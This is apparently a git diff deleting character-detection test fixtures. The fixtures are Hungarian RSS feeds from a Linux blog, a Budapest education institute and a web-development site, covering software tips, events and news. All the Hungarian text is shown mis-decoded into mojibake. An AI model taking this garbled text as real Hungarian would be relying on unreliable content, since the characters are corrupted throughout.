szolgֳ¡tatֳ¡s halmazzal rendelkezֵ‘ multiplatformos lejֳ¡tszֳ³ra hֳ­vta fel figyelmem nemrֳ©g egy haverom: <a href="http://www.yamipod.com/">YamiPod</a></p> -<ul > -<li > ֳ¶nֳ¡llֳ³ alkalmazֳ¡s</li> -<li > iPod-ot automatikusan felismeri</li> -<li > mp3 ֳ©s AAC ֳ¡llomֳ¡nyok mֳ¡solֳ¡sa iPodra/rֳ³l</li> -<li > mp3 id3 ֳ©s AAC infֳ³k irֳ¡sa/olvasֳ¡sa</li> -<li > zeneszֳ¶veg tֳ¡mogatֳ¡s (internetrֵ‘l automatikus keresֳ©ssel, unicode support)</li> -<li > lejֳ¡tszֳ¡si lista (On-The-Go is)</li> -<li > lejֳ¡tszֳ¡si lista importֳ¡lֳ¡s (PLS,M3U)</li> -<li > lejֳ¡tszֳ¡si lista exportֳ¡lֳ¡s (PLS,M3U)</li> -<li > teljes unicode tֳ¡mogatֳ¡s</li> - - egyֳ©b - Tue, 29 Nov 2005 16:43:43 -0500 - - - Nettelefon szoftver - http://linuxbox.hu/linphone - <p>Beleakadtam egy igֳ©retesnek lֳ¡tszֳ³, ingyenes, aprֳ³ alkalmazֳ¡sba. Mֳ©g nem volt idֵ‘m kiprֳ³bֳ¡lni, de felteszem, hֳ¡tha valaki megteszi helyettem: <a href="http://www.linphone.org/?lang=us&amp;rubrique=1">linphone</a></p> - - X - Wed, 19 Oct 2005 00:54:14 -0400 - - - Csapatmunka szֳ¶vegszerkesztֵ‘ - http://linuxbox.hu/gobby - <p>Hֳ¡t ez az ֳ¶tlet azֳ©rt mֳ©g engem is meglepett. Igazֳ¡bֳ³l lefordֳ­tani sem tudom rendesen a valֳ³s idejֵ± egyֳ¼tmֵ±kֳ¶dֳ©s lehetֵ‘sֳ©gֳ©t, amit a <a href="http://gobby.0x539.de">gobby</a> nevֵ± szoftver ad. Vagy legalֳ¡bbis nem hangzik tֳ÷l jֳ³l. De nagy talֳ¡lmֳ¡nynak tartom.<br /> -Kֳ¼lֳ¶nbֳ¶zֵ‘ szֳ­neket hasznֳ¡lhat mindenki, jelszֳ³val vֳ©dhetֵ‘ a munkafֳ¡zis, csevegֳ©s...bֵ‘dֳ¼letes. <img src="misc/smileys/smile.png" title="Vigyor" alt="Vigyor" /><br /> -Kֳ­vֳ¡ncsi lennֳ©k a hatֳ©konysֳ¡gֳ¡ra.</p> - - Linux - Mon, 17 Oct 2005 23:15:09 -0400 - - - Parancssoros bֵ±vֳ©szet: CheckInstall - http://linuxbox.hu/node/105 - <p>A minap bukkantam egy irasra az <a >OSNews</a> oldalon, ami egy kis segֳ©deszkֳ¶t mutatott be. Amivel a forrֳ¡sbֳ³l fordֳ­tott programokat telepֳ­tve azok bele kerֳ¼lnek a rendszer csomagkezelֵ‘jֳ©nek lֳ¡tֳ³terֳ©be <img src="misc/smileys/smile.png" title="Vigyor" alt="Vigyor" /></p> - - Linux - Wed, 12 Oct 2005 08:31:00 -0400 - - - Gourmet recept menedzser - http://linuxbox.hu/gourmet - <a href="gourmet"><div class="image thumbnail"><img src="http://linuxbox.hu/files/images/receptmenedzser.thumbnail.png" width="200" height="150" alt="Gourmet recept menedzser" title="Gourmet recept menedzser" /></div> -</a><p>Hֳ¡t mint nem talֳ¡l az ember a weben: <a href="http://grecipe-manager.sourceforge.net/">recept medzser szoftver!</a><br /> -Igֳ©retes szolgֳ¡ltatֳ¡sokat ad a kis programocska:<br /> - - receptek felvitele, kֳ©pekkel.<br /> - - keresֳ©s<br /> - - vֳ¡sֳ¡rlֳ¡si lista kֳ©szֳ­tֳ©s<br /> - - receptek importֳ¡lֳ¡sa allomֳ¡nyokbֳ³l ֳ©s a webrֵ‘l.<br /> -Sajnos van egy hֳ¡tulֳ¼tֵ‘je a dolognak: jelenleg mֳ©g nem tud magyarul a program. Viszont van egy egyszerֵ± webes felֳ¼let a fordֳ­tֳ³knak! Aki ֳ©rdekel a dolog ֳ©s belekezd, szֳ³ljon ha keszֳ¼l a magyar verziֳ³!</p> - - egyֳ©b - Sun, 18 Sep 2005 13:59:36 -0400 - - - xgestures - http://linuxbox.hu/xgestures - <p>Egy ֳ©rdekes ֳ÷j projektre leletem a mai bֳ¶ngֳ©szgetֳ©sem kֳ¶zepette: <a href="http://sourceforge.net/projects/xgestures/">xgestures</a></p> -<p>Nem tudom kell-e magyarֳ¡znom mit nyֳ÷jt a kis szolgֳ¡ltatֳ¡s.<br /> -Az ֳ¶let a firefox azonos szolgֳ¡ltatֳ¡sֳ¡bֳ³l jֳ¶tt, ami alapjֳ¡ban vֳ©ve nem is olyan rossz 5let. Szֳ³val kֳ¼lֳ¶nbֳ¶zֵ‘ kurzormozdulatokhoz kֳ¼lֳ¶nbֳ¶zֵ‘ esemֳ©nyek vannak hozzֳ¡rendelve; mint pֳ©ldֳ¡ul minimalizֳ¡lֳ¡s, kilֳ©pֳ©s, futtatֳ¡s, bezֳ¡rֳ¡s, maximalizֳ¡lֳ¡s stb.</p> -<p>Persze csakis annak aki szereti az egֳ©rrel valֳ³ manֵ‘verezֳ©st.</p> - - X - Tue, 13 Sep 2005 13:24:28 -0400 - - - Pioneers - http://linuxbox.hu/pioneers - <a href="pioneers"><div class="image thumbnail"><img src="http://linuxbox.hu/files/images/pioneers-client.thumbnail.png" width="200" height="160" alt="Pioneers" title="Pioneers" /></div> -</a><p>Talֳ¡n ismered a Catan nevֵ± tֳ¡blֳ¡s tֳ¡rsasjֳ¡tֳ©kot. Ezt a jֳ¡tֳ©kot gnocatan nֳ©vrֵ‘l neveztֳ©k ֳ¡t nemrֳ©g Pioneersra, tehֳ¡t nagyon hasonlֳ³ hozzֳ¡... ֳ‰n tavaly vettem egy tֳ¡blֳ¡s verziֳ³t a keresztfiamnak, nagy derbiket tartottunk...<br /> -Mindenesetre a dolog egy sziget kolonizֳ¡lֳ¡sֳ¡rֳ³l szֳ³l. Amit most megtehetֳ¼nk az interneten keresztֳ¼l haverokkal a <a href="http://pio.sourceforge.net/">jֳ¡tֳ©k beszerzֳ©se utֳ¡n</a>!<br /> - Aki nem ismeri feltֳ©tlen ֳ©rdemes kiprֳ³bֳ¡lni ֳ©s nem sajnֳ¡lni az idֵ‘t megtanulni a jֳ¡tֳ©kszabֳ¡lyokat!!!</p> - - jֳ¡tֳ©kok - Fri, 09 Sep 2005 20:36:43 -0400 - - - SSH dֳ©mon vֳ©delme - http://linuxbox.hu/ssh_hammer - <p>Manapsֳ¡g az interneten robotok kutatnak a gyenge jelszavas felhasznֳ¡lֳ³k shelljei utֳ¡n. Meglehetֵ‘sen kellemetlen dolog mikor lֳ¡tjuk a logjainkban a sikertelen belֳ©pֳ©si kֳ­sֳ©rleteket, mikor prֳ³bֳ¡lgatjֳ¡k kitalֳ¡lni a felhasznֳ¡lֳ³ink a jelszavֳ¡t, usernevֳ©t.</p> -<p>Termֳ©szetesen tudunk vֳ©dekezni a problֳ©ma ellen.<br /> -Kֳ©t fejta egyszerֵ± megoldֳ¡s is van:</p> -<p>1. Beֳ¡llֳ­thatunk egy speciֳ¡lisan erre fejlesztett ssh dֳ©mon konfigurֳ¡ciֳ³s paramֳ©tert: <strong >MaxStartups</strong><br /> - <strong >/etc/ssh/sshd_config</strong> konfigurֳ¡ciֳ³s ֳ¡llomֳ¡ny vֳ©gֳ©n. Tovֳ¡bbi informֳ¡ciֳ³t kahatunk a manuֳ¡lokbֳ³l. man sshd_config</p> - - Linux - Fri, 09 Sep 2005 16:06:29 -0400 - - - diff --git a/chardet/tests/utf-8/pihgy.hu.xml b/chardet/tests/utf-8/pihgy.hu.xml deleted file mode 100644 index 54b9a05..0000000 --- a/chardet/tests/utf-8/pihgy.hu.xml +++ /dev/null @@ -1,156 +0,0 @@ - - -]> - - - PIHGY - Pedagֳ³giai Intֳ©zet ֳ©s Helytֳ¶rtֳ©neti Gyֵ±jtemֳ©ny - http://pihgy.hu - Budapest XVIII. kerֳ¼leti, nevelֳ©s-oktatֳ¡si, mֵ±velֵ‘dֳ©si ֳ©s sport tֳ©mֳ¡jֳ÷ webhely ג€¢ <a href=tajekoztato_a_webhelyrol>Tֳ¡jֳ©koztatֳ³ a webhelyrֵ‘l</a> - hu - - Interjֳ÷ Magyar Bֳ¡lint oktatֳ¡si miniszterrel - http://pihgy.hu/interju_magyar_balint_oktatasi_miniszterrel - <p>Kedves Kollֳ©gֳ¡k!</p> -<p> Felhֳ­vjuk szֳ­ves figyelmeteket, hogy a Mozgֳ³ Vilֳ¡g c. folyֳ³irat 2005/decemberi szֳ¡mֳ¡ban olvashatjֳ¡tok</p> -<p> ג€A vilֳ¡g bemagolhatatlan, viszont megֳ©rthetֵ‘ג€<br /> - cֳ­mmel</p> -<p> Rֳ¡dai Eszter - Magyar Bֳ¡lint oktatֳ¡si miniszterrel kֳ©szֳ¼lt - interjֳ÷jֳ¡t.</p> - - Tue, 03 Jan 2006 21:36:21 +0100 - - - Hֳ³, hֳ³, hֳ³... - http://pihgy.hu/ho_ho_ho - <p>Boldog, bֳ©kֳ©s ֳ÷j esztendֵ‘t kֳ­vֳ¡nunk minden pedagֳ³gia ֳ©s helytֳ¶rtֳ©net irֳ¡nt ֳ©rdeklֵ‘dֵ‘ kedves lֳ¡togatֳ³nak ezekkel a 18. kerֳ¼letben kֳ©szֳ¼lt kֳ©pekkel!</p> - - - Mon, 02 Jan 2006 17:31:17 +0100 - - - A Pedagֳ³giai ֳ©s Helytֳ¶rtֳ©neti Gyֵ±jtemֳ©ny alapֳ­tֳ¡sֳ¡nak ֳ©vfordulֳ³ja - http://pihgy.hu/cimoldali/hir/a_pedagogiai_es_helytorteneti_gyujtemeny_alapitasanak_evforduloja - <p contenteditable="inherit">Tisztelt ֳ‰rdeklֵ‘dֵ‘! </p><p contenteditable="inherit" align="justify">50 ֳ©ve, 1956-ban kezdֵ‘dֳ¶tt el a telepֳ¼lֳ©sֳ¼nk mֳ÷ltjֳ¡ra vonatkozֳ³ emlֳ©kek ֳ¶sszegyֵ±jtֳ©se. Nֳ©hai Tomory Lajos iskolaigazgatֳ³ felhֳ­vֳ¡sֳ¡ra sokan felfigyeltek, ֳ©s ֳ¶rֳ¶mmel adtֳ¡k ֳ¡t addig fֳ©ltve ֵ‘rzֳ¶tt tֳ¡rgyaikat, irataikat, fֳ©nykֳ©peiket. A gyֵ±jtemֳ©ny folyamatos gazdagodֳ¡sa ma is elsֵ‘sorban a civil lakossֳ¡g jֳ³voltֳ¡bֳ³l tֳ¶rtֳ©nik. Nem mֳ÷lik el hֳ³nap, hogy valaki fel ne ajֳ¡nlana valami helyi vonatkozֳ¡sֳ÷ emlֳ©ket. Az ֳ©vfordulֳ³ alkalmֳ¡bֳ³l ezentֳ÷l honlapunk hasֳ¡bjain is szeretnֳ©nk - nֳ©v szerint - kֳ¶szֳ¶netet mondani nagylelkֵ± adomֳ¡nyozֳ³inknak. Most, az ֳ³ֳ©v vֳ©gֳ©n, az ֳ÷j rovat beindֳ­tֳ¡sa elֵ‘tt azoknak a nevֳ©t tesszֳ¼k kֳ¶zzֳ©, akik eddig is sokat tettek ilyen vonatkozֳ¡sban a XVIII. kerֳ¼leti Pedagֳ³giai ֳ©s Helytֳ¶rtֳ©neti Gyֵ±jtemֳ©nyֳ©rt. </p> - - Hֳ­rek - Fri, 30 Dec 2005 23:16:09 +0100 - - - Soundbeam bemutatֳ³ - http://pihgy.hu/cimoldali/kepzes/anketok/soundbeam_bemutato - <p><b>Kedves Fejlesztֵ‘pedagֳ³gus kollegֳ¡k!</b> </p><p>Szakmai ankֳ©tot tervezֳ¼nk 2006. februֳ¡r hֳ³napra, melyen a <b>SOUNDBEAM zeneterֳ¡piֳ¡s eszkֳ¶zt</b> tekinthetitek meg. Bֵ‘vebb informֳ¡ciֳ³t a csatolֳ¡sban olvashattok. Szeretettel vֳ¡runk minden kedves ֳ©rdeklֵ‘dֵ‘t a szakmai ankֳ©ton, melynek idֵ‘pontjֳ¡rֳ³l szemֳ©lyesen is kaptok meghֳ­vֳ³t Dobֳ³ Mֳ¡rtitֳ³l. </p><p>ֳdvֳ¶zlettel: Donֳ¡thnֳ© Forgֳ¡cs Boglֳ¡rka tanfolyamfelelֵ‘s </p> - - Szakmai ankֳ©tok - - Sat, 17 Dec 2005 10:17:42 +0100 - - - A 2005-ֳ¶s DIFER eredmֳ©nyei - http://pihgy.hu/cimoldali/cikk/a_2005_os_difer_eredmenyei - <p>A 2005-ֳ¶s DIFER-mֳ©rֳ©s elemzֳ©se</p> -<p>2005. ֳ©v szeptember ֳ©s oktֳ³ber havֳ¡ban kerֳ¼lt sor az elsֵ‘sֳ¶k bemenetmֳ©rֳ©sֳ©re. A mֳ©rֳ©s a tavalyihoz hasonlֳ³an tֳ¶rtֳ©nt, 20 kerֳ¼leti iskolֳ¡ban, 43 osztֳ¡lyban, ֳ¶sszesen 963 tanulֳ³ (ebbֵ‘l 505 fiֳ÷, 448 lֳ¡ny) kerֳ¼lt vizsgֳ¡latra. Az iskola sajֳ¡t pedagֳ³gusai ג€“ akֳ¡rcsak tavaly - ֳ÷n. ג€rֳ¶vidֳ­tettג€ DIFER - vֳ¡ltozatot (ֳ­rֳ¡smozgֳ¡s - koordinֳ¡ciֳ³, beszֳ©dhang-hallֳ¡s, szֳ¡molֳ¡si kֳ©szsֳ©g) mֳ©rtek.<br /> -Minden iskolai osztֳ¡ly mֳ©rֳ©si eredmֳ©nyeit, az iskolai ֳ¡tlagokat, a kerֳ¼leti ֳ¡tlageredmֳ©nyeket megadtuk tֳ¡blֳ¡zatos formֳ¡ban, ֳ©s mellֳ©keltֳ¼k a kֳ¼lֳ¶nbֳ¶zֵ‘ ֳ¶sszehasonlֳ­tֳ¡sok eredmֳ©nyekֳ©ppen szֳ¼letett diagramokat is.</p> - - Cikkek - Thu, 15 Dec 2005 09:38:28 +0100 - - - ֳ¡llֳ¡shirdetֳ©s - http://pihgy.hu/allashirdetes - <p contenteditable="inherit"><strong contenteditable="inherit" /></p><p contenteditable="inherit"><strong contenteditable="inherit">Informatikus munkatֳ¡rsat keresֳ¼nk a Pestszentimrei Kֳ¶zֳ¶ssֳ©gi Hֳ¡zba. </strong></p><p contenteditable="inherit">Az ideֳ¡lis jelֳ¶lt: </p> -<ul contenteditable="inherit"> -<li contenteditable="inherit">szeret csapatban dolgozni </li> -<li contenteditable="inherit">kֳ¶nnyen beilleszkedik a csapatba </li> -<li contenteditable="inherit">jֳ³l kommunikֳ¡l az ֳ¼gyfelekkel ֳ©s a kollֳ©gֳ¡ival egyarֳ¡nt </li> -<li contenteditable="inherit">jֳ³ monotֳ³nia tֵ±rֳ©ssel rendelkezik </li> -<li contenteditable="inherit">pontos, precֳ­z ֳ©s folyamatosan fejleszti tudֳ¡sֳ¡t </li> -</ul> -<p contenteditable="inherit"> Elvֳ¡rֳ¡sok: </p> - - Mon, 12 Dec 2005 18:57:38 +0100 - - - Az integrֳ¡ciֳ³s konferencia elֵ‘adֳ¡sainak anyagai - http://pihgy.hu/cimoldali/kepzes/anketok/az_integracios_konferencia_eloadasainak_anyagai - <p>Idֵ‘pont: 2005. november 10. 11 ֳ³ra<br /> -Helyszֳ­n: Kondor Bֳ©la Kֳ¶zֳ¶ssֳ©gi Hֳ¡z</p> -<p>1. Kandֳ³ Tֳ©ri ֳltalֳ¡nos Iskola (Dobֳ³ Kֳ¡lmֳ¡nnֳ©) mֵ±sora<br /> -2. Dr. ֳrmֳ¶s Andor Egֳ©szsֳ©gֳ¼gyi Minisztֳ©rium romaֳ¼gyi osztֳ¡lyvezetֵ‘</p> -<p>Fogalmi zavarok ג€“ integrֳ¡ciֳ³ kohֳ©ziֳ³<br /> -Felzֳ¡rkֳ³ztatֳ³ oktatֳ¡s helyett integrֳ¡lt oktatֳ¡s (szegregֳ¡lֳ¡s)<br /> -A sֳ©rֳ¼lt gyerekeket jobb integrֳ¡ltan oktatni, kֳ©sֵ‘bb jֳ³val kevֳ©sbֳ© szakadnֳ¡nak el a munkaerֵ‘piacon.<br /> -A szegregֳ¡ciֳ³nak mֳ¡r van pontos fogalma, az integrֳ¡ciֳ³nak igazֳ¡n nincs.<br /> -A szegregֳ¡ciֳ³ ott kisebb, ahol tֳ¡rsadalmi kֳ¼lֳ¶nbsֳ©gek kisebbek. (USA-Norvֳ©gia)</p> - - Szakmai ankֳ©tok - Mon, 12 Dec 2005 14:03:52 +0100 - - - Nyelvi ankֳ©t - http://pihgy.hu/cimoldali/kepzes/anketok/nyelvi_anket - <p><b>Tisztelt nyelszakos Kollegֳ¡k!</b> </p><p> A XVI. kerֳ¼let nyelvi munkakֳ¶zֳ¶ssֳ©ge 2005. december 15.-ֳ©n 15.00-16.00-ig a XVIII. kerֳ¼let Pedagֳ³giai Intֳ©zetben (1181 Budapest, Kondor Bֳ©la sֳ©tֳ¡ny 10.) a <b>Szֳ³mֳ¡nia szֳ³, kiejtֳ©s, helyesֳ­rֳ¡s szoftver bemutatֳ³jֳ¡t</b> rendezi meg. A program 2005 szeptemberֳ©ben elֵ‘szֳ¶r az IATEFL orszֳ¡gos nyelvtanֳ¡r konferenciֳ¡n kerֳ¼lt bemutatֳ¡sra, ahol nagy sikert aratott, azֳ³ta megyei ֳ©s kerֳ¼leti bemutatֳ³kra kerֳ¼lt sor. A program angol verziֳ³ja mellett 2006 elsֵ‘ negyedֳ©vֳ©ben a nֳ©met verziֳ³ is megjelenֳ©sre kerֳ¼l, ezֳ©rt az elֵ‘adֳ¡sra az angol ֳ©s nֳ©met szakos kollֳ©gֳ¡kat is szeretettel vֳ¡rjuk. </p> - - Szakmai ankֳ©tok - Sun, 04 Dec 2005 07:48:28 +0100 - - - "Mozdulj, ֳ¼gyesedj!" Akkreditֳ¡lt pedagֳ³gus kֳ©pzֳ©s - http://pihgy.hu/cimoldali/kepzes/akkreditalt/mozdulj_ugyesedj_akkreditalt_pedagogus_kepzes - <p><b>"Mozdulj, ֳ¼gyesedj!" (60 ֳ³rֳ¡s akkreditֳ¡lt tanfolyam) </b></p><p><b>Speciֳ¡lis prevenciֳ³s ֳ©s korrekciֳ³s torna az ֳ³vodֳ¡sok ֳ©s kisiskolֳ¡sok testnevelֳ©sֳ©ben </b></p><p><b />Alapֳ­tֳ¡si ֳ©s indֳ­tֳ¡si engedֳ©ly szֳ¡ma: 175 / 25 / 2005 </p><p>A tovֳ¡bbkֳ©pzֳ©s cֳ©lcsoportja: ֳ³vodapedagֳ³gusok, tanֳ­tֳ³k, testnevelֵ‘ tanֳ¡rok, gyֳ³gytestnevelֵ‘k ֳ©s gyֳ³gypedagֳ³gusok </p><p>A tovֳ¡bbkֳ©pzֳ©s cֳ©lja: A tovֳ¡bbkֳ©pzֳ©s elmֳ©leti ֳ©s gyakorlati segֳ­tsֳ©get kֳ­vֳ¡n nyֳ÷jtani azoknak a pedagֳ³gusoknak, akik a 3-10 ֳ©ves korosztֳ¡ly testnevelֳ©sֳ©vel foglalkoznak. </p><p>Bemutatja, hogy mikֳ©nt lehet a gyֳ³gytestnevelֳ©s mozgֳ¡sanyagֳ¡t adaptֳ¡lni az ֳ³vodֳ¡sok ֳ©s a kisiskolֳ¡sok testnevelֳ©sֳ©ben. Megismerteti a helyes testtartֳ¡s kialakֳ­tֳ¡sֳ¡hoz, valamint a helytelen testtartֳ¡sok megelֵ‘zֳ©sֳ©hez ֳ©s korrekciֳ³jֳ¡hoz szֳ¼ksֳ©ges alapvetֵ‘ anatֳ³miai ismereteket. Betekintֳ©st nyֳ÷jt a kezdֵ‘dֵ‘ mozgֳ¡sszervi elvֳ¡ltozֳ¡sokat megelֵ‘zֵ‘ ֳ©s korrigֳ¡lֳ³ speciֳ¡lis gyakorlatanyag hasznֳ¡latֳ¡nak elmֳ©leti alapjaiba, valamint a mozgֳ¡sterֳ¡pia gyakorlatֳ¡ba. </p> - - Akkreditֳ¡lt kֳ©pzֳ©sek - Sun, 04 Dec 2005 07:31:47 +0100 - - - A reֳ¡l munkakֳ¶zֳ¶ssֳ©gek tanulmֳ¡nyi kirֳ¡ndulֳ¡sa - http://pihgy.hu/cimoldali/cikk/a_real_munkakozossegek_tanulmanyi_kirandulasa - <p>A kerֳ¼leti tovֳ¡bbkֳ©pzֳ©si napon 4 munkakֳ¶zֳ¶ssֳ©g, a fֳ¶ldrajz, biolֳ³gia, kֳ©mia ֳ©s fizika tagjai tanulmֳ¡nyi kirֳ¡ndulֳ¡son vettek rֳ©szt, az esztergomi Magyar Kֳ¶rnyezetvֳ©delmi ֳ©s Vֳ­zֳ¼gyi Mֳ÷zeumot lֳ¡togattֳ¡k meg. Tֳ¶bb mint negyven kollֳ©gֳ¡val ragyogֳ³ kֳ©sֵ‘ ֵ‘szi napsֳ¼tֳ©sben indultunk ֳ÷tnak. A mֳ÷zeum - amely a vֳ­zֳ¼gyi emlֳ©khelyek hֳ¡lֳ³zatֳ¡nak kֳ¶zpontja - Esztergom egyik legszebb barokk ֳ©pֳ¼letֳ©ben (1730-as ֳ©vek) kapott helyet.<br /> -A kֳ¼llemֳ©ben ֳ©s a mֵ±kֳ¶dֳ©s kֳ¶rֳ¼lmֳ©nyeiben nֳ©hֳ¡ny ֳ©ve megֳ÷jult Duna Mֳ÷zeum 2001. oktֳ³ber 9.-ֳ©tֵ‘l vֳ¡rja ismֳ©t lֳ¡togatֳ³it. Ez ֳ©v oktֳ³berֳ©ben ג€Csalֳ¡dbarֳ¡t Mֳ÷zeumג€- dֳ­jat kaptak.</p> - - Cikkek - Wed, 23 Nov 2005 15:01:06 +0100 - - - Szakmai nap 2005. november 9 - http://pihgy.hu/cimoldali/hir/szakmai_nap_2005_november_9 - <p contenteditable="inherit">A kerֳ¼leti technika munkakֳ¶zֳ¶ssֳ©g 2005. november 9-ֳ©n a Kֳ¶zponti Mֵ±helyben tartotta meg a pedagֳ³giai hֳ©t szakmai foglalkozֳ¡sֳ¡t. 14 nevelֵ‘ vett rֳ©szt a tovֳ¡bbkֳ©pzֳ©sen,ֲ  melyen a felsֵ‘ tagozatos technikaֲ  tantֳ¡rgyhoz egy ֳ÷j munkadarabot terveztֳ¼nk ֳ©s kֳ©szֳ­tettֳ¼nk el. Mֵ±szaki rajz alapjֳ¡n egy mobiltelefon tartֳ³t alkotott mindenki. A tovֳ¡bbkֳ©pzֳ©st a jelen lֳ©vֵ‘k nagyon hasznosnak,ֲ  pֳ©ldֳ¡san szervezettnek ֳ©s magas szֳ­nvonalֳ÷nak ֳ­tֳ©ltֳ©k meg. Az elֳ©gedettsֳ©get mֳ©rֵ‘ kֳ©rdֵ‘ֳ­vek ֳ¶sszesֳ­tֳ©sֳ©nֳ©l az alֳ¡bbi visszajelzֳ©sek ֳ©rkeztek: </p> - - Hֳ­rek - - Wed, 09 Nov 2005 15:05:02 +0100 - - - A Pedagֳ³giai Hֳ©t 2005. november 7-11. - http://pihgy.hu/cimoldali/hir/a_pedagogiai_het_2005_november_7_11 - <p contenteditable="inherit">A Pedagֳ³giai Intֳ©zet ֳ©s Helytֳ¶rtֳ©neti Gyֵ±jtemֳ©ny ֳ¡ltal szervezett ֵ‘szi PEDAGֳ“GIAI Hֳ‰T programjairֳ³l tֳ¡jֳ©koztatֳ³. </p><p contenteditable="inherit">2005. november 7-ֳ©n a Kondor Bֳ©la Kֳ¶zֳ¶ssֳ©gi Hֳ¡zban kerֳ¼lt sor a nyitֳ³ programra. 65 fֵ‘ vett rֳ©szt a rendezvֳ©nyen, amelyen a "Hatֳ©kony tanulֳ¡si mֳ³dszerek" cֳ­mmel Petkes Csaba az Apֳ¡czai Kiadֳ³ referense tartott szֳ­nvonalas elֵ‘adֳ¡st. A rendezvֳ©ny rֳ©sztvevֵ‘inek elֳ©gedettsֳ©gֳ©t mֳ©rֵ‘ kֳ©rdֵ‘ֳ­vek ֳ¶sszesֳ­tֳ©se alapjֳ¡n, az alֳ¡bbi vֳ©lemֳ©nyeket adtֳ¡k le a jelenlevֵ‘ pedagֳ³gusok.</p><p contenteditable="inherit">A programokon rֳ©szt vevֵ‘ nevelֵ‘k - a kiadott elֳ©gedettsֳ©gi kֳ©rdֵ‘ֳ­ven - 1-tֵ‘l 4 pontig adhattֳ¡k le vֳ©lemֳ©nyֳ¼ket a lֳ¡tottakrֳ³l, hallottakrֳ³l.</p> - - Hֳ­rek - Tue, 08 Nov 2005 14:25:21 +0100 - - - ֳ–sszegzֳ©s - http://pihgy.hu/cimoldali/cikk/internet/osszegzes - <p>A Pedagֳ³giai Intֳ©zet ֳ©s Helytֳ¶rtֳ©neti Gyֵ±jtemֳ©ny ֳ¡ltal gondozott webhely, a <strong>http://pihgy.hu</strong> cֳ­men, 2002. szeptember 24-ֳ©n meg a mֵ±kֳ¶dֳ©sֳ©t. Az eltelt idֵ‘szak indokolttֳ¡ teszi, hogy az ֳ¶sszegyֵ±lt tapasztalatokat ֳ¡ttekintsem. </p> -<p>Az elsֵ‘ kֳ©t ֳ©vben az ֳ÷n. <a href="http://postnuke.com/" target="_blank">PostNuke</a> rendszer adta a technikai alapjֳ¡t a tartalomkֳ¶zlֳ©snek, amely lecserֳ©lֳ©sre kerֳ¼lt 2004. oktֳ³ber 23-ֳ¡n, a <a href="http://drupal.org/" target="_blank">Drupal</a> alkalmazֳ¡sֳ¡ra. Ez jelentֵ‘s technikai mֳ³dosֳ­tֳ¡s volt, amellyel a lehetֵ‘sֳ©gek alaposan megvֳ¡ltoztak.</p> - Internet - Mon, 31 Oct 2005 14:05:21 +0100 - - - Szֳ¼reti mulatsֳ¡g az Ady Iskolֳ¡ban - http://pihgy.hu/cimoldali/hir/szureti_mulatsag_az_ady_iskolaban - <p>Szeptember 30-ֳ¡n ismֳ©t megrendeztֳ¼k az Ady Endre Utcai ֳltalֳ¡nos Iskolֳ¡ban a mֳ¡r hagyomֳ¡nnyֳ¡ vֳ¡lt Szֳ¼reti mulatsֳ¡gunkat. Kicsik ֳ©s nagyok ֳ¶rֳ¶mmel vettek rֳ©szt a vidֳ¡m dֳ©lutֳ¡non. A kisebbek nagy lendֳ¼lettel ֳ©s szorgalommal ֳ¡lltak neki a szֵ‘lֵ‘ szemezֳ©sֳ©nek, ֳ©s bֳ¡r nֳ©ha tֳ¶bb kerֳ¼lt a pocakjukba mint a tֳ¡lba, mֳ©gis az egyֳ¼tt tֳ¶ltֳ¶tt idֵ‘, a vidֳ¡m beszֳ©lgetֳ©s pֳ³tolta a hiֳ¡nyzֳ³ szֵ‘lֵ‘szemeket. A darֳ¡lֳ¡srֳ³l ֳ©s prֳ©selֳ©srֵ‘l a nagyobb fiֳ÷k ֳ©s lֳ¡nyok gondoskodtak, ekֳ¶zben a kisebbek egy szֳ¼reti vetֳ©lkedֵ‘n vehettek rֳ©szt. A gyerekek vegyes csapatokban mֳ©rhettֳ©k ֳ¶ssze erejֳ¼ket, ֳ­gy a kֳ¼lֳ¶nbֳ¶zֵ‘ osztֳ¡lyok tanulֳ³i is jobban megismerhettֳ©k egymֳ¡st. A vetֳ©lkedֵ‘ vֳ©geztֳ©vel jֳ³kedvֵ±en ֳ¡lltunk sorba a jֳ³l megֳ©rdemelt zsֳ­ros kenyֳ©rֳ©rt ֳ©s az idֳ©n kֳ¼lֳ¶nlegesen finomra sikerֳ¼lt mֳ©zֳ©des mustֳ©rt.</p> - - Hֳ­rek - Fri, 28 Oct 2005 11:39:51 +0200 - - - Idegen nyelvi kֳ©pzֳ©sek a Karinthy Frigyes Gimnֳ¡ziumban - http://pihgy.hu/cimoldali/kepzes/nyelvi/idegen_nyelvi_kepzesek_a_karinthy_frigyes_gimnaziumban_0 - <b contenteditable="inherit">Tisztelt Pedagֳ³gus Kollegֳ¡k!</b><p contenteditable="inherit"> </p><p contenteditable="inherit">Kedvezmֳ©nyes nyelvi kֳ©pzֳ©sek indultak 2005. oktֳ³ber hֳ³naptֳ³l a Karinthy Frigyes Gimnֳ¡ziumban a kerֳ¼letben dolgozֳ³ pedagֳ³gusok szֳ¡mֳ¡ra. Folyamatosan lehet mֳ©g jelentkezni az angol ֳ©s nֳ©met kezdֵ‘, haladֳ³, vagy szintentartֳ³ kֳ©pzֳ©seinkre. A kֳ©pzֳ©sek dֳ©lelֵ‘tti ֳ©s dֳ©lutֳ¡ni idֵ‘pontokban is lehetֵ‘sֳ©get adnak a nyelvtanulֳ¡sra. Az idֵ‘pontok a csoportok igֳ©nyei szerint mֳ©g vֳ¡ltozhatnak, vֳ©gleges idֵ‘pont oktֳ³ber vֳ©gֳ©re fog kialakulni. Jelentkezֳ©seiteket a tanfolyam@pihgy.hu E-mail cֳ­mre minֳ©l hamarabb kֳ¼ldjֳ©tek el, hogy segֳ­tsek a kapcsolattartֳ¡sban. </p> - Idegen nyelvi kֳ©pzֳ©sek pedagֳ³gusoknak - Thu, 27 Oct 2005 17:30:09 +0200 - - - diff --git a/chardet/tests/utf-8/weblabor.hu.2.xml b/chardet/tests/utf-8/weblabor.hu.2.xml deleted file mode 100644 index b18f043..0000000 --- a/chardet/tests/utf-8/weblabor.hu.2.xml +++ /dev/null @@ -1,121 +0,0 @@ - - -]> - - - Weblabor - a fejlesztֵ‘i forrֳ¡s - http://weblabor.hu - - hu - - Hֳ¡rom aktֳ­v PHP verziֳ³ lehet hasznֳ¡latban 2006-ban - http://weblabor.hu/hirek/20060104/haromphpverzio - Anonim bekֳ¼ldֵ‘nk hֳ­vta fel a figyelmֳ¼nket az Internetnews PHP: Three Versions, One Promise cֳ­mֵ± cikkֳ©re, mely felveti a kֳ©rdֳ©st: problֳ©mֳ¡t jelent-e majd 2006-ban a megjelentetni tervezett PHP 6 illetve a mֳ©g el sem terjedt PHP 5 ֳ©s a szֳ©les kֳ¶rben hasznֳ¡lt PHP 4 egyֳ¼ttֳ©lֳ©se. 